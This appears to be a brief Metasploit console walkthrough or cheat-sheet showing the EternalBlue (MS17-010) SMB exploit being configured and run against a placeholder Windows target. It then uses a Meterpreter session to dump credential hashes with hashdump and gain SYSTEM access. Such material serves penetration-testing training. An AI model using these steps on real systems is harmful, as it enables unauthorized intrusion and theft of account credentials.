# ── Launch & Search ──────────────────────────
└─# msfconsole
Metasploit Framework 6.3 · 2300+ exploits
msf6 > search eternalblue
Matching Modules:
0 exploit/windows/smb/ms17_010_eternalblue
# ── Use Module & Configure ───────────────────
msf6 > use 0
msf6 exploit(ms17_010_eternalblue) > show options
Required: RHOSTS, LHOST, LPORT
msf6 exploit > set RHOSTS 10.10.X.X
msf6 exploit > set LHOST 10.X.X.X
# ── Exploit ──────────────────────────────────
msf6 exploit > run
[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer: TARGET-PC | OS: Windows 10
meterpreter > hashdump
Administrator:500:hash:hash:::
meterpreter > background
msf6 > sessions -l
1 meterpreter 10.10.X.X → SYSTEM
msf6 >